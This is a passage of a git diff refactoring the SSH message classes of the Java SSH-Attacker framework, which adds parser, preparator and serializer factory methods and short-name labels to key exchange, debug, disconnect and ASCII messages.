{ if (context.isHandleAsClient()) { context.setServerVersion(message.getVersion().getValue()); context.setServerComment(message.getComment().getValue()); @@ -37,7 +34,7 @@ public void adjustContext() { } } - @Override + /*@Override public VersionExchangeMessageParser getParser(byte[] array) { return new VersionExchangeMessageParser(array); } @@ -55,5 +52,5 @@ public VersionExchangeMessagePreparator getPreparator() { @Override public VersionExchangeMessageSerializer getSerializer() { return new VersionExchangeMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/AsciiMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/AsciiMessage.java index 26b81de79..035c78566 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/AsciiMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/AsciiMessage.java @@ -9,9 +9,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.AsciiMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.AsciiMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.AsciiMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.AsciiMessageSerializer; +import java.io.InputStream; /** * An generic text message sent via the Blob message layer. @@ -56,11 +60,32 @@ public void setEndOfMessageSequence(String endOfMessageSequence) { @Override public AsciiMessageHandler getHandler(final SshContext context) { - return new AsciiMessageHandler(context, this); + // return new AsciiMessageHandler(context, this); + return new AsciiMessageHandler(context); + } + + @Override + public AsciiMessagePreparator getPreparator(SshContext sshContext) { + return new AsciiMessagePreparator(sshContext.getChooser(), this); + } + + @Override + public AsciiMessageSerializer getSerializer(SshContext sshContext) { + return new AsciiMessageSerializer(this); + } + + @Override + public AsciiMessageParser getParser(SshContext sshContext, InputStream stream) { + return new AsciiMessageParser(stream); } @Override public String toCompactString() { return this.getClass().getSimpleName(); } + + @Override + public String toShortString() { + return "ASCII_MESSAGE"; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DebugMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DebugMessage.java index efd9f9fec..433b99a89 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DebugMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DebugMessage.java @@ -11,10 +11,14 @@ import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.DebugMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.DebugMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.DebugMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.DebugMessageSerializer; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class DebugMessage extends SshMessage { @@ -124,6 +128,26 @@ public void setLanguageTag(String languageTag, boolean adjustLengthField) { @Override public DebugMessageHandler getHandler(SshContext context) { - return new DebugMessageHandler(context, this); + return new DebugMessageHandler(context); + } + + @Override + public DebugMessageParser getParser(SshContext context, InputStream stream) { + return new DebugMessageParser(stream); + } + + @Override + public DebugMessagePreparator getPreparator(SshContext context) { + return new DebugMessagePreparator(context.getChooser(), this); + } + + @Override + public DebugMessageSerializer getSerializer(SshContext context) { + return new DebugMessageSerializer(this); + } + + @Override + public String toShortString() { + return "DEBUG_MSG"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeGroupMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeGroupMessage.java index e1b354c26..953b80cd7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeGroupMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeGroupMessage.java @@ -10,9 +10,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.biginteger.ModifiableBigInteger; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.handler.DhGexKeyExchangeGroupMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.DhGexKeyExchangeGroupMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.DhGexKeyExchangeGroupMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.DhGexKeyExchangeGroupMessageSerializer; +import java.io.InputStream; import java.math.BigInteger; public class DhGexKeyExchangeGroupMessage extends SshMessage { @@ -106,6 +110,26 @@ public void setGroupGenerator(BigInteger groupGenerator, boolean adjustLengthFie @Override public DhGexKeyExchangeGroupMessageHandler getHandler(SshContext context) { - return new DhGexKeyExchangeGroupMessageHandler(context, this); + return new DhGexKeyExchangeGroupMessageHandler(context); + } + + @Override + public DhGexKeyExchangeGroupMessageParser getParser(SshContext context, InputStream stream) { + return new DhGexKeyExchangeGroupMessageParser(stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new DhGexKeyExchangeGroupMessagePreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new DhGexKeyExchangeGroupMessageSerializer(this); + } + + @Override + public String toShortString() { + return "DHGexKEYGROUP"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeInitMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeInitMessage.java index cb15101e8..9fed50d6d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeInitMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeInitMessage.java @@ -10,9 +10,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.biginteger.ModifiableBigInteger; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.handler.DhGexKeyExchangeInitMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.DhGexKeyExchangeInitMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.DhGexKeyExchangeInitMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.DhGexKeyExchangeInitMessageSerializer; +import java.io.InputStream; import java.math.BigInteger; public class DhGexKeyExchangeInitMessage extends SshMessage { @@ -65,6 +69,27 @@ public void setEphemeralPublicKey(BigInteger ephemeralPublicKey, boolean adjustL @Override public DhGexKeyExchangeInitMessageHandler getHandler(SshContext context) { - return new DhGexKeyExchangeInitMessageHandler(context, this); + return new DhGexKeyExchangeInitMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new DhGexKeyExchangeInitMessageParser(stream); + } + + @Override + public DhGexKeyExchangeInitMessagePreparator getPreparator(SshContext context) { + return new DhGexKeyExchangeInitMessagePreparator(context.getChooser(), this); + } + + @Override + public DhGexKeyExchangeInitMessageSerializer getSerializer(SshContext context) { + return new DhGexKeyExchangeInitMessageSerializer(this); + } + + @Override + public String toShortString() { + return "DHGexKeyExInit"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeOldRequestMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeOldRequestMessage.java index 2490a2d98..22cd592d0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeOldRequestMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeOldRequestMessage.java @@ -9,9 +9,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.handler.DhGexKeyExchangeOldRequestMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.DhGexKeyExchangeOldRequestMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.DhGexKeyExchangeOldRequestMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.DhGexKeyExchangeOldRequestMessageSerializer; +import java.io.InputStream; public class DhGexKeyExchangeOldRequestMessage extends SshMessage { @@ -34,6 +38,27 @@ public void setPreferredGroupSize(int preferredGroupSize) { @Override public DhGexKeyExchangeOldRequestMessageHandler getHandler(SshContext context) { - return new DhGexKeyExchangeOldRequestMessageHandler(context, this); + return new DhGexKeyExchangeOldRequestMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new DhGexKeyExchangeOldRequestMessageParser(stream); + } + + @Override + public DhGexKeyExchangeOldRequestMessagePreparator getPreparator(SshContext context) { + return new DhGexKeyExchangeOldRequestMessagePreparator(context.getChooser(), this); + } + + @Override + public DhGexKeyExchangeOldRequestMessageSerializer getSerializer(SshContext context) { + return new DhGexKeyExchangeOldRequestMessageSerializer(this); + } + + @Override + public String toShortString() { + return "DHGKexOldRequest"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeReplyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeReplyMessage.java index 8cba37a06..360cfdacb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeReplyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeReplyMessage.java @@ -13,9 +13,13 @@ import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.crypto.util.PublicKeyHelper; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.handler.DhGexKeyExchangeReplyMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.DhGexKeyExchangeReplyMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.DhGexKeyExchangeReplyMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.DhGexKeyExchangeReplyMessageSerializer; +import java.io.InputStream; import java.math.BigInteger; public class DhGexKeyExchangeReplyMessage extends SshMessage @@ -176,6 +180,26 @@ public void setSignature(byte[] signature, boolean adjustLengthField) { @Override public DhGexKeyExchangeReplyMessageHandler getHandler(SshContext context) { - return new DhGexKeyExchangeReplyMessageHandler(context, this); + return new DhGexKeyExchangeReplyMessageHandler(context); + } + + @Override + public DhGexKeyExchangeReplyMessageParser getParser(SshContext context, InputStream stream) { + return new DhGexKeyExchangeReplyMessageParser(stream); + } + + @Override + public DhGexKeyExchangeReplyMessagePreparator getPreparator(SshContext context) { + return new DhGexKeyExchangeReplyMessagePreparator(context.getChooser(), this); + } + + @Override + public DhGexKeyExchangeReplyMessageSerializer getSerializer(SshContext context) { + return new DhGexKeyExchangeReplyMessageSerializer(this); + } + + @Override + public String toShortString() { + return "DHGKeyExReply"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeRequestMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeRequestMessage.java index 5a1eac830..aa12e6550 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeRequestMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhGexKeyExchangeRequestMessage.java @@ -9,9 +9,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.handler.DhGexKeyExchangeRequestMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.DhGexKeyExchangeRequestMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.DhGexKeyExchangeRequestMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.DhGexKeyExchangeRequestMessageSerializer; +import java.io.InputStream; public class DhGexKeyExchangeRequestMessage extends SshMessage { @@ -61,6 +65,27 @@ public void setMaximalGroupSize(int maximalGroupSize) { @Override public DhGexKeyExchangeRequestMessageHandler getHandler(SshContext context) { - return new DhGexKeyExchangeRequestMessageHandler(context, this); + return new DhGexKeyExchangeRequestMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new DhGexKeyExchangeRequestMessageParser(stream); + } + + @Override + public DhGexKeyExchangeRequestMessagePreparator getPreparator(SshContext context) { + return new DhGexKeyExchangeRequestMessagePreparator(context.getChooser(), this); + } + + @Override + public DhGexKeyExchangeRequestMessageSerializer getSerializer(SshContext context) { + return new DhGexKeyExchangeRequestMessageSerializer(this); + } + + @Override + public String toShortString() { + return "DhGKEXReq"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeInitMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeInitMessage.java index 59258e818..4ece6b32c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeInitMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeInitMessage.java @@ -10,9 +10,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.biginteger.ModifiableBigInteger; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.handler.DhKeyExchangeInitMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.DhKeyExchangeInitMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.DhKeyExchangeInitMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.DhKeyExchangeInitMessageSerializer; +import java.io.InputStream; import java.math.BigInteger; public class DhKeyExchangeInitMessage extends SshMessage { @@ -65,6 +69,27 @@ public void setEphemeralPublicKey(BigInteger ephemeralPublicKey, boolean adjustL @Override public DhKeyExchangeInitMessageHandler getHandler(SshContext context) { - return new DhKeyExchangeInitMessageHandler(context, this); + return new DhKeyExchangeInitMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new DhKeyExchangeInitMessageParser(stream); + } + + @Override + public DhKeyExchangeInitMessagePreparator getPreparator(SshContext context) { + return new DhKeyExchangeInitMessagePreparator(context.getChooser(), this); + } + + @Override + public DhKeyExchangeInitMessageSerializer getSerializer(SshContext context) { + return new DhKeyExchangeInitMessageSerializer(this); + } + + @Override + public String toShortString() { + return "DHgKexInit"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeReplyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeReplyMessage.java index aa1cb722d..cbabe8399 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeReplyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeReplyMessage.java @@ -13,9 +13,13 @@ import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.crypto.util.PublicKeyHelper; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.handler.DhKeyExchangeReplyMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.DhKeyExchangeReplyMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.DhKeyExchangeReplyMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.DhKeyExchangeReplyMessageSerializer; +import java.io.InputStream; import java.math.BigInteger; public class DhKeyExchangeReplyMessage extends SshMessage @@ -175,6 +179,26 @@ public void setSignature(byte[] signature, boolean adjustLengthField) { @Override public DhKeyExchangeReplyMessageHandler getHandler(SshContext context) { - return new DhKeyExchangeReplyMessageHandler(context, this); + return new DhKeyExchangeReplyMessageHandler(context); + } + + @Override + public DhKeyExchangeReplyMessageParser getParser(SshContext context, InputStream stream) { + return new DhKeyExchangeReplyMessageParser(stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new DhKeyExchangeReplyMessagePreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new DhKeyExchangeReplyMessageSerializer(this); + } + + @Override + public String toShortString() { + return "DHkeyExchangeRepl"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DisconnectMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DisconnectMessage.java index e4e255724..40320f095 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DisconnectMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DisconnectMessage.java @@ -11,9 +11,13 @@ import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.constants.DisconnectReason; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.DisconnectMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.DisconnectMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.DisconnectMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.DisconnectMessageSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class DisconnectMessage extends SshMessage { @@ -124,6 +128,26 @@ public void setLanguageTag(String languageTag, boolean adjustLengthField) { @Override public DisconnectMessageHandler getHandler(SshContext context) { - return new DisconnectMessageHandler(context, this); + return new DisconnectMessageHandler(context); + } + + @Override + public DisconnectMessageParser getParser(SshContext context, InputStream stream) { + return new DisconnectMessageParser(stream); + } + + @Override + public DisconnectMessagePreparator getPreparator(SshContext context) { + return new DisconnectMessagePreparator(context.getChooser(), this); + } + + @Override + public DisconnectMessageSerializer getSerializer(SshContext context) { + return new DisconnectMessageSerializer(this); + } + + @Override + public String toShortString() { + return "DISCONNECT"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/EcdhKeyExchangeInitMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/EcdhKeyExchangeInitMessage.java index 3485294c0..a2e78b0ad 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/EcdhKeyExchangeInitMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/EcdhKeyExchangeInitMessage.java @@ -10,9 +10,13 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.EcdhKeyExchangeInitMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.EcdhKeyExchangeInitMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.EcdhKeyExchangeInitMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.EcdhKeyExchangeInitMessageSerializer; +import java.io.InputStream; public class EcdhKeyExchangeInitMessage extends SshMessage { @@ -64,6 +68,26 @@ public void setEphemeralPublicKey(byte[] ephemeralPublicKey, boolean adjustLengt @Override public EcdhKeyExchangeInitMessageHandler getHandler(SshContext context) { - return new EcdhKeyExchangeInitMessageHandler(context, this); + return new EcdhKeyExchangeInitMessageHandler(context); + } + + @Override + public EcdhKeyExchangeInitMessageParser getParser(SshContext context, InputStream stream) { + return new EcdhKeyExchangeInitMessageParser(stream); + } + + @Override + public EcdhKeyExchangeInitMessagePreparator getPreparator(SshContext context) { + return new EcdhKeyExchangeInitMessagePreparator(context.getChooser(), this); + } + + @Override + public EcdhKeyExchangeInitMessageSerializer getSerializer(SshContext context) { + return new EcdhKeyExchangeInitMessageSerializer(this); + } + + @Override + public String toShortString() { + return "ECDHE_KEX_INIT"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/EcdhKeyExchangeReplyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/EcdhKeyExchangeReplyMessage.java index 23ef156d5..c2f0f884a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/EcdhKeyExchangeReplyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/EcdhKeyExchangeReplyMessage.java @@ -12,9 +12,13 @@ import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.crypto.util.PublicKeyHelper; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.EcdhKeyExchangeReplyMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.EcdhKeyExchangeReplyMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.EcdhKeyExchangeReplyMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.EcdhKeyExchangeReplyMessageSerializer; +import java.io.InputStream; public class EcdhKeyExchangeReplyMessage extends SshMessage implements HostKeyMessage, ExchangeHashSignatureMessage { @@ -174,6 +178,26 @@ public void setSignature(byte[] signature, boolean adjustLengthField) { @Override public EcdhKeyExchangeReplyMessageHandler getHandler(SshContext context) { - return new EcdhKeyExchangeReplyMessageHandler(context, this); + return new EcdhKeyExchangeReplyMessageHandler(context); + } + + @Override + public EcdhKeyExchangeReplyMessageParser getParser(SshContext context, InputStream stream) { + return new EcdhKeyExchangeReplyMessageParser(stream); + } + + @Override + public EcdhKeyExchangeReplyMessagePreparator getPreparator(SshContext context) { + return new EcdhKeyExchangeReplyMessagePreparator(context.getChooser(), this); + } + + @Override + public EcdhKeyExchangeReplyMessageSerializer getSerializer(SshContext context) { + return new EcdhKeyExchangeReplyMessageSerializer(this); + } + + @Override + public String toShortString() { + return "KEX_REPLY"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/HybridKeyExchangeInitMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/HybridKeyExchangeInitMessage.java index ef1f970f9..7d4d43807 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/HybridKeyExchangeInitMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/HybridKeyExchangeInitMessage.java @@ -10,10 +10,15 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.transport.handler.HybridKeyExchangeInitMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.HybridKeyExchangeInitMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.HybridKeyExchangeInitMessagePreperator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.HybridKeyExchangeInitMessageSerializer; +import java.io.InputStream; public class HybridKeyExchangeInitMessage extends SshMessage { @@ -111,6 +116,40 @@ public void setEncapsulationPublicKey( @Override public SshMessageHandler getHandler(SshContext context) { - return new HybridKeyExchangeInitMessageHandler(context, this); + return new HybridKeyExchangeInitMessageHandler(context); + } + + /*@Override + public HybridKeyExchangeInitMessageParser getParser(SshContext context, InputStream stream) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeInitMessageParser( + array, + kex.getCombiner(), + kex.getPkAgreementLength(), + kex.getPkEncapsulationLength()); + }*/ + + @Override + public HybridKeyExchangeInitMessageParser getParser(SshContext context, InputStream stream) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeInitMessageParser(context, stream); + } + + @Override + public HybridKeyExchangeInitMessagePreperator getPreparator(SshContext context) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeInitMessagePreperator( + context.getChooser(), this, kex.getCombiner()); + } + + @Override + public HybridKeyExchangeInitMessageSerializer getSerializer(SshContext context) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeInitMessageSerializer(this, kex.getCombiner()); + } + + @Override + public String toShortString() { + return "HYB_KEY_EXCHANGE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/HybridKeyExchangeReplyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/HybridKeyExchangeReplyMessage.java index 5fc0db617..4ceccc63b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/HybridKeyExchangeReplyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/HybridKeyExchangeReplyMessage.java @@ -10,11 +10,19 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.crypto.util.PublicKeyHelper; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.transport.handler.HybridKeyExchangeReplyMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.transport.parser.HybridKeyExchangeReplyMessageParser; +import de.rub.nds.sshattacker.core.protocol.transport.preparator.HybridKeyExchangeReplyMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.HybridKeyExchangeReplyMessageSerializer; +import java.io.InputStream; public class HybridKeyExchangeReplyMessage extends SshMessage implements HostKeyMessage, ExchangeHashSignatureMessage { @@ -205,6 +213,38 @@ public void setSignature(byte[] signature, boolean adjustLengthField) { @Override public HybridKeyExchangeReplyMessageHandler getHandler(SshContext context) { - return new HybridKeyExchangeReplyMessageHandler(context, this); + return new HybridKeyExchangeReplyMessageHandler(context); + } + + /*@Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeReplyMessageParser( + array, kex.getCombiner(), kex.getPkAgreementLength(), 